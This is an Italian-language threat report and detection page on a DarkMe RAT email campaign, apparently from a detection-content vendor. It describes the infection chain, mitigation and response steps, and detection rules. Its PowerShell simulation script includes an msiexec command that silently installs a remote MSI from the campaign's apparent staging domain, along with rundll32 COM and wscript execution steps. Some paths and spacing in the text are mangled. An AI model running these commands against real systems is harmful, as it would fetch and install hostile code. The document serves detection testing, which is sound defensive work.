La campagna email di DarkMe amplia il targeting negli attacchi APT RAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
È stata osservata una nuova campagna che distribuisce il DarkMe spy-RAT facendo affidamento sull’ingegneria sociale piuttosto che sugli exploit software. Gli aggressori distribuiscono un .pif file tramite email, che avvia una catena di infezione a più stadi che coinvolge MSIEXEC e diversi loader basati su VB6. Il passaggio dall’uso di exploit zero-day a ingegneria sociale ad alto volume suggerisce un cambiamento verso metodi di attacco più economici, ampi e meno selettivi.
Indagine
Huntress ha identificato la campagna dopo aver rilevato un .pif file che avviava l’Installatore di Windows per recuperare un pacchetto MSI remoto. L’analisi ha scoperto una catena complessa a più stadi che coinvolge uno script di staging chiamato prnfig.wsf, importazioni del registro e l’esecuzione di un oggetto COM tramite rundll32.exe /sta. Lo stadio finale utilizza l’hollowing di processo per iniettare il payload DarkMe nel binario Microsoft firmato clspack.exe.
Mitigazione
I difensori dovrebbero monitorare rundll32.exe avviato con il /sta flag e un GUID senza un percorso DLL di accompagnamento. I team di sicurezza dovrebbero anche rilevare msiexec che recupera pacchetti MSI remoti tramite HTTPS e indagare sull’esecuzione di .pif file. I binari Microsoft firmati che vengono eseguiti da posizioni insolite come %AppData% dovrebbero ricevere ulteriore attenzione.
Risposta
Quando viene rilevata un’attività sospetta, isolare immediatamente l’endpoint interessato per interrompere la comunicazione C2 e prevenire l’esfiltrazione di dati. Terminare il clspack.exe processo e rimuovere gli artefatti malevoli da %AppData%ComponentsFolder and %AppData%Microsoft. Rimuovere la persistenza creata tramite il gestore di protocollo URL personalizzato e il HKCU Run chiave. Resettare le credenziali utente interessate e trattare eventuali portafogli di criptovaluta memorizzati localmente come potenzialmente compromessi.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Possibili Punti di Persistenza [ASEPs – Software/NTUSER Hive] (tramite registry_event)
Estensione Insolita di Binario Eseguibile (tramite process_creation)
LOLBAS WScript / CScript (tramite process_creation)
Possibile Tentativo di Installazione di File MSI Remoto (tramite cmdline)
Comando e Controllo Sospetto tramite Richiesta DNS di Dominio di Primo Livello Insolito (TLD) (tramite dns)
IOCs (HashSha256) per rilevare: Campagna Email DarkMe Estende il Targeting per APT RAT
IOCs (SourceIP) per rilevare: Campagna Email DarkMe Estende il Targeting per APT RAT
IOCs (DestinationIP) per rilevare: Campagna Email DarkMe Estende il Targeting per APT RAT
Rileva Comunicazione C2 e Dominio di Staging per DarkMe RAT [Connessione di Rete di Windows]
Rilevamento delle Attività della Campagna Maligna DarkMe RAT [Creazione Processo di Windows]
Esecuzione di Simulazione
-
Narrare l’Attacco & Comandi: L’avversario mira a distribuire il RAT DarkMe per mantenere la persistenza. Per evitare il rilevamento basato su firme, l’attaccante utilizza
msiexecper prelevare un payload remoto da un dominio compromesso (onlineview365.com). Dopo l’infezione iniziale, l’attaccante usarundll32.exeper invocare un oggetto COM specifico tramite un GUID per eseguire codice in memoria, e successivamente utilizzacmd.exeper importare configurazioni di registro da un file di testo per preparare l’ambiente per unwscript.exeesecuzione del payload basata su. -
Script di Test di Regressione:
# Script di Simulazione DarkMe RAT # Questo script simula esattamente le righe di comando definite nella regola Sigma. Write-Host "[+] Avviando Simulazione DarkMe RAT..." -ForegroundColor Cyan # 1. Simula download remoto di msiexec Write-Host "[*] Simulando download remoto di msiexec..." Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue # 2. Simula esecuzione oggetto COM rundll32 Write-Host "[*] Simulando esecuzione COM rundll32..." Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue # 3. Simula importazione registro cmd.exe Write-Host "[*] Simulando importazione registro cmd.exe..." $tempFile = "$env:TEMPfiletext2.txt" "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait # 4. Simula esecuzione wscript.exe tramite catena parent cmd/rundll32 Write-Host "[*] Simulando esecuzione wscript.exe da AppData..." $scriptPath = "$env:APPDATAmalicious_script.vbs" "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii # Per attivare la regola specifica parent/child: # Parente: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} # Figlio: wscript.exe %AppData%malicious_script.vbs Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait Write-Host "[+] Simulazione Completa." -ForegroundColor Green -
Comandi di Pulizia:
# Pulizia Artifacts di Simulazione Write-Host "[+] Pulizia in corso..." -ForegroundColor Yellow Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue Write-Host "[+] Pulizia Completata." -ForegroundColor Green